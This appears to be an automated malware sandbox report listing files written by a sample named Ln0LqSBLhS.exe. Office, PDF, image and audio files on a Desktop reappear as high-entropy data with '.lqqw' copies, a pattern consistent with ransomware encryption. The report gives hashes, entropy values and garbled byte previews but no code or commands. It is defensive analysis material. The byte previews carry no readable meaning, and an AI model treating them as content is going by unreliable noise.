                                                                                                                                                                                                    SSDEEP:24:gcqaR6vvRwjRlF7s6jy44SVcAf80OgUyVTmwuEaN0K8KDYn+DJCpPfbD:g1aR6vKdlFm4PXApyVq28JCBD
                                                                                                                                                                                                    MD5:81AC590BA78CE4503BC32D9D9EB8ED13
                                                                                                                                                                                                    SHA1:2891A606547EF81F2A7B5C9D93D087D04F1D4AEE
                                                                                                                                                                                                    SHA-256:0315B2FFB89EE7E789D33F09717443B0F43A6132A8457F81E0BAB79FD81A14E6
                                                                                                                                                                                                    SHA-512:27A845D5F9D7950A7EECAFCEAEE58BD84B4C60AFC768A017A002A85C176E1614EBA17A2F5176E713D05B71767D1DB356F40559918D6CF04DA19D3C000CEB33DF
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: c......s..E.M..K....2."%vC:.h."...... ....q..I....='k'..%.........<^.O...}2.PA...w..K9..w}....u{.+...uX..7.?.(~v.......&~.?b....!O..}..h.h..._....{...MG.$.z9.:....T4x..M..;`a%.=.Q.~s......<...2.1.{%C.....)A.....5..u.f.K...o..%>..+..v.1...|..%..]M$...U.cYB.)..e.N..4..|X.........%..."S.......5.......3o..<..hN..#....<C.3:..o...x.n2....z|....?w..?."...S.....D..O..q.v...L.. ..b}:.s"..{.O.y..c.v......E....]. ..4..D...A...{.....(.#z.;-1<...{.,...9....'..U\....]k....b...V....VH(.>....(.9.B.MZ.....2...*v.K.MV.%.....}{.....:........2..vd."..S..D.J..%:.*.b.:D...C_..TJ.....z.r.[*......i.....*.....(..}5.JU.v.=.Ho.X..!.(....P.U.*..D...^.....4_f.Z.B.*...4.A..S.....T...y......u..=_.......T|....6'...V..J.gSnnE.T.-..|."..PP{_..?....x.l...E.'p.......8.....M...R.;...9.,b..M.....h.*..m2....*....m..j;.o.Upn.zO..^..>I$|.v.N.#"i...QnK...+y........f....Y.AP...F1.|..+.{p!6..Sd....D....W.#...k..40......hd.n.......rI.p.B#.Y....h.....G>..v.`....q..".
                                                                                                                                                                                                    C:\Users\user\Desktop\DUUDTUBZFW\CZQKSDDMWR.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.838804864066309
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:wQxUyPNF0JZvKoRLI1WsDHG9bH/3Ggj9f8qJXKSuWkK6I67z80cZves33zFLchUp:F/VF0/t+8Km9H/58NbxTY0gveM3WheD
                                                                                                                                                                                                    MD5:E3CB12C22EA9E3B2D9A6D6358CB480C8
                                                                                                                                                                                                    SHA1:ABC2986E49FE768DAB8C200CFE27A93D36FCD7BB
                                                                                                                                                                                                    SHA-256:511FDD7C7A681D0E760C7CEFA7689F7DCBD77E7E0F4BB62540992DA046EA93C1
                                                                                                                                                                                                    SHA-512:3038738B4DECE806364CB3EE72460EA5CE5D97EAEEFBD081411B62A31CD305918B28880EE017D3DE313941229398485C4F249B9CE980EBEFDA367D5233094A8D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..O.&.wQ.... ..*..J.>.4.....&.;.!Q([...r...js.O.....a...z..7..8C..S$.....O2....M.lX*..!$.F,`'L./..L..|ai.T....#..M...-.U-.....R.PR.....I.....;..Vp.>,.`..........T.....fy^...O...>.*.2.'.Z;.aQ..6...?..m.dD".\."N.u.s....<..n....?.8.s.D.i.w.d.54....>'.....2.....,8..S[G...&.E.G.p....?.L..........s...&...........w9..V.a.....9.+.r...I....zL=R..C.C..A@....k..=y..%........L...5.VL.s.#.b......@j7u..c..}.qO..P/.2i.?(&..di.....JH...........~R.j......@..?f3...u.k....<2..E..!..\..<x....%.#.g....B.cm..l..........).u..__Z#..,..L.......2......SJ...A...4v..[XU..s.......6./..G.A........;SB....DJ.W......6pj<%..c.....S.b.x.3...%."?-.......A=.W..}.....{.q....b.O.=:81tYz..<RK}S.y.....U.:.....X.;.Z[.gO@.N}Yp9...0.....7P[0..^.P.y.=.i.A...'.I]*|...M../.../M.E.w...mc.R..5."..].......N.c..t;...$..2.y%g.{...n..j-J.v.0......6.V.r/..3|.:.LrY}.il1...3`D%..A...z...G.U|.z..Poa....ZD~.a..m../.]....4.o..!...3_.:ro,S.&.3.zW(.Q .k.ze.t.>?..z...0..E.X.@....Ad ...T.c...v+QSF2?...
                                                                                                                                                                                                    C:\Users\user\Desktop\DUUDTUBZFW\CZQKSDDMWR.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.838804864066309
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:wQxUyPNF0JZvKoRLI1WsDHG9bH/3Ggj9f8qJXKSuWkK6I67z80cZves33zFLchUp:F/VF0/t+8Km9H/58NbxTY0gveM3WheD
                                                                                                                                                                                                    MD5:E3CB12C22EA9E3B2D9A6D6358CB480C8
                                                                                                                                                                                                    SHA1:ABC2986E49FE768DAB8C200CFE27A93D36FCD7BB
                                                                                                                                                                                                    SHA-256:511FDD7C7A681D0E760C7CEFA7689F7DCBD77E7E0F4BB62540992DA046EA93C1
                                                                                                                                                                                                    SHA-512:3038738B4DECE806364CB3EE72460EA5CE5D97EAEEFBD081411B62A31CD305918B28880EE017D3DE313941229398485C4F249B9CE980EBEFDA367D5233094A8D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..O.&.wQ.... ..*..J.>.4.....&.;.!Q([...r...js.O.....a...z..7..8C..S$.....O2....M.lX*..!$.F,`'L./..L..|ai.T....#..M...-.U-.....R.PR.....I.....;..Vp.>,.`..........T.....fy^...O...>.*.2.'.Z;.aQ..6...?..m.dD".\."N.u.s....<..n....?.8.s.D.i.w.d.54....>'.....2.....,8..S[G...&.E.G.p....?.L..........s...&...........w9..V.a.....9.+.r...I....zL=R..C.C..A@....k..=y..%........L...5.VL.s.#.b......@j7u..c..}.qO..P/.2i.?(&..di.....JH...........~R.j......@..?f3...u.k....<2..E..!..\..<x....%.#.g....B.cm..l..........).u..__Z#..,..L.......2......SJ...A...4v..[XU..s.......6./..G.A........;SB....DJ.W......6pj<%..c.....S.b.x.3...%."?-.......A=.W..}.....{.q....b.O.=:81tYz..<RK}S.y.....U.:.....X.;.Z[.gO@.N}Yp9...0.....7P[0..^.P.y.=.i.A...'.I]*|...M../.../M.E.w...mc.R..5."..].......N.c..t;...$..2.y%g.{...n..j-J.v.0......6.V.r/..3|.:.LrY}.il1...3`D%..A...z...G.U|.z..Poa....ZD~.a..m../.]....4.o..!...3_.:ro,S.&.3.zW(.Q .k.ze.t.>?..z...0..E.X.@....Ad ...T.c...v+QSF2?...
                                                                                                                                                                                                    C:\Users\user\Desktop\DUUDTUBZFW\DUUDTUBZFW.docx
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.859769864913067
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:LVjR3lJvyq838q2Z2GrSIsCab4DcvrOexXflqnuSB/QVOnjnBaKKHNRbD:PVJOKrrSIirGuSFQVOzB+HzD
                                                                                                                                                                                                    MD5:5C2368DF2E859DF65BD28BF416A338C5
                                                                                                                                                                                                    SHA1:0DCCD8AC2595CC175E69BBEC0382424295606A92
                                                                                                                                                                                                    SHA-256:BA435CFD0333DE7431D2A9C77E5CAD3D13C5BF13186F0E840961DF7125DF1A12
                                                                                                                                                                                                    SHA-512:CF3727078F31339B4C7A28A53A0D4D39195D988B7278CB9AD40547A0CFFC8B4D0846BFD24C1CE1E349B31B7F3B2402767CD760C8D87399C4A8281593009C4532
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: g.V9..C.l...X:9.).<.~e...4.=o...B>..8...$..R..."..?&.r....c..jn.U..d.:X...0.SF..p.....p..~<...l..%..5..N....X.)....X.)..{....S5V.C....?a......1..[.B....j.....#.@...........f(..@.jq....0..U..1.-....!..M.Dx`Y.....@-U.`..OwzI......b...+..^...-....YK.U/"Gz......L6r.U........$6...=......#..5....W.7<..^%.j...X. +;....9...#..28.....X.ed..,.j..HJ...D"..=..P.........R....8..yCON_.9f.O.]..4+.,.....C..'z5#q.....v7iz.2.....=.[r!...Y../......r......E...}.HCM.NT..A....._w..^..7|-`..J?.=...$b.&.|@Rp....u@.......|<k.<.q.rG.9b..e.Fn.C..nL.|*.c.&hP.q.My..f+..@[..1....i...>F8.....%.]+.@...D..l.T.1...?...@s#)./.z.,..t....9|.+... ...]|.....Ny..j.Q.7.s....CI...~.).f{...<s;.....E..@.%P.f..8w.Tn./...bR"[..)..U}...+.......D..|....Ji^....p_.....l(...q].0M...gZ.}.{w.I..J... .L>.r..!l.#.`.u.JT...v.:.. ?...Q&.X+.6U+G..L...v.]...6oo<q..i..&.$.O.."n...Y.....Vc...Y ...8. ..T.D.^i...{l...._.S.`iU.S.%.<W....l.....#..Y.A.m.+....;....<Z.9V........~.Aj....${.P..3
                                                                                                                                                                                                    C:\Users\user\Desktop\DUUDTUBZFW\DUUDTUBZFW.docx.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.859769864913067
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:LVjR3lJvyq838q2Z2GrSIsCab4DcvrOexXflqnuSB/QVOnjnBaKKHNRbD:PVJOKrrSIirGuSFQVOzB+HzD
                                                                                                                                                                                                    MD5:5C2368DF2E859DF65BD28BF416A338C5
                                                                                                                                                                                                    SHA1:0DCCD8AC2595CC175E69BBEC0382424295606A92
                                                                                                                                                                                                    SHA-256:BA435CFD0333DE7431D2A9C77E5CAD3D13C5BF13186F0E840961DF7125DF1A12
                                                                                                                                                                                                    SHA-512:CF3727078F31339B4C7A28A53A0D4D39195D988B7278CB9AD40547A0CFFC8B4D0846BFD24C1CE1E349B31B7F3B2402767CD760C8D87399C4A8281593009C4532
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: g.V9..C.l...X:9.).<.~e...4.=o...B>..8...$..R..."..?&.r....c..jn.U..d.:X...0.SF..p.....p..~<...l..%..5..N....X.)....X.)..{....S5V.C....?a......1..[.B....j.....#.@...........f(..@.jq....0..U..1.-....!..M.Dx`Y.....@-U.`..OwzI......b...+..^...-....YK.U/"Gz......L6r.U........$6...=......#..5....W.7<..^%.j...X. +;....9...#..28.....X.ed..,.j..HJ...D"..=..P.........R....8..yCON_.9f.O.]..4+.,.....C..'z5#q.....v7iz.2.....=.[r!...Y../......r......E...}.HCM.NT..A....._w..^..7|-`..J?.=...$b.&.|@Rp....u@.......|<k.<.q.rG.9b..e.Fn.C..nL.|*.c.&hP.q.My..f+..@[..1....i...>F8.....%.]+.@...D..l.T.1...?...@s#)./.z.,..t....9|.+... ...]|.....Ny..j.Q.7.s....CI...~.).f{...<s;.....E..@.%P.f..8w.Tn./...bR"[..)..U}...+.......D..|....Ji^....p_.....l(...q].0M...gZ.}.{w.I..J... .L>.r..!l.#.`.u.JT...v.:.. ?...Q&.X+.6U+G..L...v.]...6oo<q..i..&.$.O.."n...Y.....Vc...Y ...8. ..T.D.^i...{l...._.S.`iU.S.%.<W....l.....#..Y.A.m.+....;....<Z.9V........~.Aj....${.P..3
                                                                                                                                                                                                    C:\Users\user\Desktop\DUUDTUBZFW\EIVQSAOTAQ.xlsx
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.844162314733947
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:Mxc6iad98XMnAXI77ZT4CvkJmEOcAbWzF44z3ZFfAXvoF5hVs+YsTsb+ARJj1jnF:MxNt+cvZT3v3E7AShDbIfoF5hVfRG+sF
                                                                                                                                                                                                    MD5:8ECD8A8E7835B0D06D8874AFF9E811CF
                                                                                                                                                                                                    SHA1:2EB22EA4DDC52EE20CF584C6B31CAE811DF922ED
                                                                                                                                                                                                    SHA-256:20112DA482E0B105B1B6828FB33E51002CA328DA889BD386D9723744A724B335
                                                                                                                                                                                                    SHA-512:0B143D17CD3DA65FEDC2375920F0C9B079A824E701020044CBE4F4632E360B4A008754D8B4B9CBC605C4BCE9D96C49DB4880105AEC0E724A49067944BA1C9C00
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: oJ...m.....;.d....,.|....;@..<.......O.....O|D/...M...~m...{.A./2]D..H:..^...u.2.........tx........P;0.....Y0z.......Ho.GYZ.....K:rJ..y....cbA.H....S..a...F...K.z........2e.{}.A!o..J.Qp?..ja.m..xB..&..67`Tv5.Z....Ngj.."u.I..\....<^...<..(l.ly..N .`.)z.d_..y...._..ps>..`.....).ym.?/7.......I.3.}...~..^t....n.f9.\...Rd..r....7.4...^........v.B...U...X.;...=.Y.t.x....|..{..vm.:...F.9x.N....s........q.D.../D.....3\k.p.#..8.x4..N...v......c.g.`......kt...$q.....,g.q......5..O^.5.O....e?.4Y..... !.%.].V........s.A...z6F;]u..;....SE.......J.^.R.bM....^.id...!(......1..<Na..)...&.(...C......w..z...iNA..R..W5.6>...+}.W....T..T.x...Anj....U<..._.!F=...K.T..W..D.....0..&.v.>e"D'`.cy.....-.....!{.e....(GG.w.f.Yl..z...c......z....KT.7$.L......4..=....BD...U...!.~..?).d`.G.......R-..% .R...6...Kg?.T'.T.....x.D.....c.XU...].....E-|\X..|.n.n..2.@........?...@Y..g....2.%?A...0I..5.Ky/[=..M[./.H.....d;..~...T.6....!.9W..E+.L.oQ.E.|.....B.....+...W..~.\..
                                                                                                                                                                                                    C:\Users\user\Desktop\DUUDTUBZFW\EIVQSAOTAQ.xlsx.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.844162314733947
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:Mxc6iad98XMnAXI77ZT4CvkJmEOcAbWzF44z3ZFfAXvoF5hVs+YsTsb+ARJj1jnF:MxNt+cvZT3v3E7AShDbIfoF5hVfRG+sF
                                                                                                                                                                                                    MD5:8ECD8A8E7835B0D06D8874AFF9E811CF
                                                                                                                                                                                                    SHA1:2EB22EA4DDC52EE20CF584C6B31CAE811DF922ED
                                                                                                                                                                                                    SHA-256:20112DA482E0B105B1B6828FB33E51002CA328DA889BD386D9723744A724B335
                                                                                                                                                                                                    SHA-512:0B143D17CD3DA65FEDC2375920F0C9B079A824E701020044CBE4F4632E360B4A008754D8B4B9CBC605C4BCE9D96C49DB4880105AEC0E724A49067944BA1C9C00
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: oJ...m.....;.d....,.|....;@..<.......O.....O|D/...M...~m...{.A./2]D..H:..^...u.2.........tx........P;0.....Y0z.......Ho.GYZ.....K:rJ..y....cbA.H....S..a...F...K.z........2e.{}.A!o..J.Qp?..ja.m..xB..&..67`Tv5.Z....Ngj.."u.I..\....<^...<..(l.ly..N .`.)z.d_..y...._..ps>..`.....).ym.?/7.......I.3.}...~..^t....n.f9.\...Rd..r....7.4...^........v.B...U...X.;...=.Y.t.x....|..{..vm.:...F.9x.N....s........q.D.../D.....3\k.p.#..8.x4..N...v......c.g.`......kt...$q.....,g.q......5..O^.5.O....e?.4Y..... !.%.].V........s.A...z6F;]u..;....SE.......J.^.R.bM....^.id...!(......1..<Na..)...&.(...C......w..z...iNA..R..W5.6>...+}.W....T..T.x...Anj....U<..._.!F=...K.T..W..D.....0..&.v.>e"D'`.cy.....-.....!{.e....(GG.w.f.Yl..z...c......z....KT.7$.L......4..=....BD...U...!.~..?).d`.G.......R-..% .R...6...Kg?.T'.T.....x.D.....c.XU...].....E-|\X..|.n.n..2.@........?...@Y..g....2.%?A...0I..5.Ky/[=..M[./.H.....d;..~...T.6....!.9W..E+.L.oQ.E.|.....B.....+...W..~.\..
                                                                                                                                                                                                    C:\Users\user\Desktop\DUUDTUBZFW\KLIZUSIQEN.pdf
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.847212889044992
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:6UO3Rkpltuh16dN2wEBUjdvcKFFPExjw7q0v41c2mIasWT3OxBQViKlc6kbD:6dkehU+leFPLPERwd41t/W+GIKC5D
                                                                                                                                                                                                    MD5:76B24F4A5B46B69CDDDDEC509DD88264
                                                                                                                                                                                                    SHA1:51193D0F18586986A66A159E6073FF637F42910D
                                                                                                                                                                                                    SHA-256:0299E5BC68A4F851C059DFC3CD0A8DE80AC00B4E4E546455C0862BA786B154E9
                                                                                                                                                                                                    SHA-512:0523DED9EFEC64DFB98AC258AAC78A6D7AC92ABAD940E35320E861105FFED7567B8869F1BB9E1C8EC991A273819B33963C1D54809FA4E25CD2CBE4C8C23D0A61
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....!.F.9.O.-?......N.....Mdn.ZD...^.V+.d..b......9..t.....G.o.0...yd.e..;...........d".u!..m.iH......!pn..|0.j0.g?J.l\.w+<.y....uY9......]...gL..%.`...A.2.P..........:.!...+%..r].a..{.$.wJ.......=.&..M.w..8g.G.....y..g"..g..).......a..].l.........s.x....O..=j.W...HZ;{.}.?8n...j.L...MS~.?VwZ../5.'.T.w...>3vB z...Pti...O....&s...7.\..'..!Vv.S=...G..?.-.$..B......Mp.7.F.f..wv.......)!.A.h.zD|r...~j.....`N.dX<...mW..,.&.)+.j...2..Bl..%..Zv>...*,..q..T..........z?...i.........?.....".....B...v.J.......g.....;.i...6A8T..[E5.".M6.M.{^,Y.....X.....'. c^2.........1.S/;.a>-....7..f.?xm..vh..i.-.2..c.+.`....(...0.r..p._ ...j.+.{\*)..`..z~~.......P...Z.qg#.}.M.Y.J.O......='.......v.....k..4.;...S..40C/*..dil.....c.V-..q.x........4...^.x......$.Y.'S=..?.R#.4.'...e.;Zg.Y..\>.h....8~uQb. ......v.++.QF.y.N.....5&.eJ..t3M..4S.....Gd......).c.3....3i;d9....Zv\......Fg.?...e5(...q^.4g......3.]t.t./.dK.}{..Ox....2.....0*.}8....j..3..Fv5..8...]k.
                                                                                                                                                                                                    C:\Users\user\Desktop\DUUDTUBZFW\KLIZUSIQEN.pdf.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.847212889044992
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:6UO3Rkpltuh16dN2wEBUjdvcKFFPExjw7q0v41c2mIasWT3OxBQViKlc6kbD:6dkehU+leFPLPERwd41t/W+GIKC5D
                                                                                                                                                                                                    MD5:76B24F4A5B46B69CDDDDEC509DD88264
                                                                                                                                                                                                    SHA1:51193D0F18586986A66A159E6073FF637F42910D
                                                                                                                                                                                                    SHA-256:0299E5BC68A4F851C059DFC3CD0A8DE80AC00B4E4E546455C0862BA786B154E9
                                                                                                                                                                                                    SHA-512:0523DED9EFEC64DFB98AC258AAC78A6D7AC92ABAD940E35320E861105FFED7567B8869F1BB9E1C8EC991A273819B33963C1D54809FA4E25CD2CBE4C8C23D0A61
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....!.F.9.O.-?......N.....Mdn.ZD...^.V+.d..b......9..t.....G.o.0...yd.e..;...........d".u!..m.iH......!pn..|0.j0.g?J.l\.w+<.y....uY9......]...gL..%.`...A.2.P..........:.!...+%..r].a..{.$.wJ.......=.&..M.w..8g.G.....y..g"..g..).......a..].l.........s.x....O..=j.W...HZ;{.}.?8n...j.L...MS~.?VwZ../5.'.T.w...>3vB z...Pti...O....&s...7.\..'..!Vv.S=...G..?.-.$..B......Mp.7.F.f..wv.......)!.A.h.zD|r...~j.....`N.dX<...mW..,.&.)+.j...2..Bl..%..Zv>...*,..q..T..........z?...i.........?.....".....B...v.J.......g.....;.i...6A8T..[E5.".M6.M.{^,Y.....X.....'. c^2.........1.S/;.a>-....7..f.?xm..vh..i.-.2..c.+.`....(...0.r..p._ ...j.+.{\*)..`..z~~.......P...Z.qg#.}.M.Y.J.O......='.......v.....k..4.;...S..40C/*..dil.....c.V-..q.x........4...^.x......$.Y.'S=..?.R#.4.'...e.;Zg.Y..\>.h....8~uQb. ......v.++.QF.y.N.....5&.eJ..t3M..4S.....Gd......).c.3....3i;d9....Zv\......Fg.?...e5(...q^.4g......3.]t.t./.dK.}{..Ox....2.....0*.}8....j..3..Fv5..8...]k.
                                                                                                                                                                                                    C:\Users\user\Desktop\DUUDTUBZFW\LFOPODGVOH.mp3
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.8579952153264365
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:3G5ulcqA73V3Jx3dq/5EX3NjMaRQSlpoQWgDmQwjEUZCAN/5WmNEDba2bD:WkJy9dq/5EX3N1plGLgZJAEbakD
                                                                                                                                                                                                    MD5:F3BDE0419569CB0011CAA0E19FD885EC
                                                                                                                                                                                                    SHA1:BB0666289A2729369EBA8F36667E6F02ED097D15
                                                                                                                                                                                                    SHA-256:4935F33718987AA8A8E49F184BC41BB84A1D4972BDC56FD93058A12FE19D90E1
                                                                                                                                                                                                    SHA-512:D75E5EA41F9CF1F073600BE93E4A096C9FB8A5A39ADA52346D091563723A3CC4828D0D3115E462E7616057D1E7F8B215A6BE7DAACF601B4521D9AE7E999D8369
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: A}.C..T.pA..{..).1...lkT.r`.6..>?...).c....A.m.yg.,.>.T.I....c....1./.]...p..|.......+]2>M..E.T.X..Se{M.....:FO'...eTw.$..k...HR.Q.;.!.z..a.~m. ..o..>?..s.]..%..itAIM.P......E.2.! ,d..}...,..v#......{.#..i.u.H.Ml.`...b...C........A.eV-.@b..t:N(........i....G..Gj{r..Dj1[.hY}............-.....$`..p..8.O.w.<.>4(./nS."..k.".;.{P.c+.e....j...6a.P....>._..Di.R...A..8.X......9.m]5.1.?..K`f.O..9..I.S.l=.......>.p..0..]w~.<.(.z./...Q.+X.a....glvO....bs ..=...w..D.2....i..b..'. T..o..5u.3...:*.2.u(.. ..F....z.i......+q..@.Wa.#....i.p...yX1..Z;.F0u.i&d.;...'&.|.....P]...#:..!...h.e..T...9.....&....Y.<OZ.W.g8....[h..>.9}.6.....E...0..'.*...D.&L%F...e.Q.c2.)....2j..x..-)m.E.J..A(..ou.....u..p +.~.s..V......U.."....|..SV.....!...$.8*..p...=..F..'.xU::....`..s.`?o.=D O...Xt...~...|.jhX....l.l.......-.z$...>......~..F9..c...N..~....,.a1+....tB..)b.o...T7.....p..."...Og.v2X!Q..+....V.....c.F..H...'.....)..t.R..`{_..X.{&.2......iH...
                                                                                                                                                                                                    C:\Users\user\Desktop\DUUDTUBZFW\LFOPODGVOH.mp3.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.8579952153264365
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:3G5ulcqA73V3Jx3dq/5EX3NjMaRQSlpoQWgDmQwjEUZCAN/5WmNEDba2bD:WkJy9dq/5EX3N1plGLgZJAEbakD
                                                                                                                                                                                                    MD5:F3BDE0419569CB0011CAA0E19FD885EC
                                                                                                                                                                                                    SHA1:BB0666289A2729369EBA8F36667E6F02ED097D15
                                                                                                                                                                                                    SHA-256:4935F33718987AA8A8E49F184BC41BB84A1D4972BDC56FD93058A12FE19D90E1
                                                                                                                                                                                                    SHA-512:D75E5EA41F9CF1F073600BE93E4A096C9FB8A5A39ADA52346D091563723A3CC4828D0D3115E462E7616057D1E7F8B215A6BE7DAACF601B4521D9AE7E999D8369
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: A}.C..T.pA..{..).1...lkT.r`.6..>?...).c....A.m.yg.,.>.T.I....c....1./.]...p..|.......+]2>M..E.T.X..Se{M.....:FO'...eTw.$..k...HR.Q.;.!.z..a.~m. ..o..>?..s.]..%..itAIM.P......E.2.! ,d..}...,..v#......{.#..i.u.H.Ml.`...b...C........A.eV-.@b..t:N(........i....G..Gj{r..Dj1[.hY}............-.....$`..p..8.O.w.<.>4(./nS."..k.".;.{P.c+.e....j...6a.P....>._..Di.R...A..8.X......9.m]5.1.?..K`f.O..9..I.S.l=.......>.p..0..]w~.<.(.z./...Q.+X.a....glvO....bs ..=...w..D.2....i..b..'. T..o..5u.3...:*.2.u(.. ..F....z.i......+q..@.Wa.#....i.p...yX1..Z;.F0u.i&d.;...'&.|.....P]...#:..!...h.e..T...9.....&....Y.<OZ.W.g8....[h..>.9}.6.....E...0..'.*...D.&L%F...e.Q.c2.)....2j..x..-)m.E.J..A(..ou.....u..p +.~.s..V......U.."....|..SV.....!...$.8*..p...=..F..'.xU::....`..s.`?o.=D O...Xt...~...|.jhX....l.l.......-.z$...>......~..F9..c...N..~....,.a1+....tB..)b.o...T7.....p..."...Og.v2X!Q..+....V.....c.F..H...'.....)..t.R..`{_..X.{&.2......iH...
                                                                                                                                                                                                    C:\Users\user\Desktop\DUUDTUBZFW\NYMMPCEIMA.jpg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.8432785080875504
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:KXgmt6RMLzEV0ndXTbFUIcmv5lRXCYzoxDplPugFo34IUZmkHuTybD:agm0RSEV0ndHFUINv5lWFl68mk8gD
                                                                                                                                                                                                    MD5:AA4657721034880A9DF8511ECC1E06DC
                                                                                                                                                                                                    SHA1:8BE40DCDB447CBF422C07E358C9AB7472E2CD452
                                                                                                                                                                                                    SHA-256:9614AD3345E316E45867BC83BBC7E3DB9A42F8611F991E12FD9AE9D8FFC6B160
                                                                                                                                                                                                    SHA-512:CC5BB0091D9B78FBB52B5A90C7EE0C1FD7A8B54D54F93341F720BFCB8F840662707EAC1396C2DD7B8495BC4759104E72F324FEF163A9DEA72D61B0408999518F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..............q..l....1HA..>.$..sGH@...+...+..'.}+o..0R..J.6r*a9F!.....tW/..n.K...K...7>.D.Z...G.gF..x..l.:.D.q..T#.z.8.h..5....9.>...&....J.M........*=....p#Y.4.i.....s....lb..pj..zb.U..@...9.wy...5....D.....EBz..F.....[>phi/G\.s6cj....P..(...C..we.Z..2..j..!"......2.?.N..(.H.....-....@.dT..)q..F..f.s$.9.>.$B...?...G...X..;,h....#....m.q..aE.........>..AoI...\....@!2...u:(.%..fU.?....N.F..f}.....tq9]3..-..~..U..t....*J...h...rAh.P........dS..{.L....^.v.R....=wp..d........&*..0s.1....."*..Pa...8.V.~.C.g..Jv...*7..z.........3 R.<.M+....P...e..e..8.'.E.d.2.$.j.^..Y.Fl.vI..G............}..:.z..Y..p..v.#/n..x....^..8.i8.1.*........kl.V..66c.p8&..Y.....N...m./.y=N..G.m.CdF&S{qG?.a...{.O...2...q...a..":...I.Z*...e.}@..Z..gaah.x.R.).h7.[..T\~|...4.g...}.l...Fz...W.....o....Q..pT}..wn]...,.[.0.q....8.~.\N.........we#...2T.A..v..K...X.c...M..d}.......3..N?9.~Uu.L.h.EA.......R~t.......m...77Y....U8I...>...h....l.P...:...-.....=....
                                                                                                                                                                                                    C:\Users\user\Desktop\DUUDTUBZFW\NYMMPCEIMA.jpg.lqqw (copy)
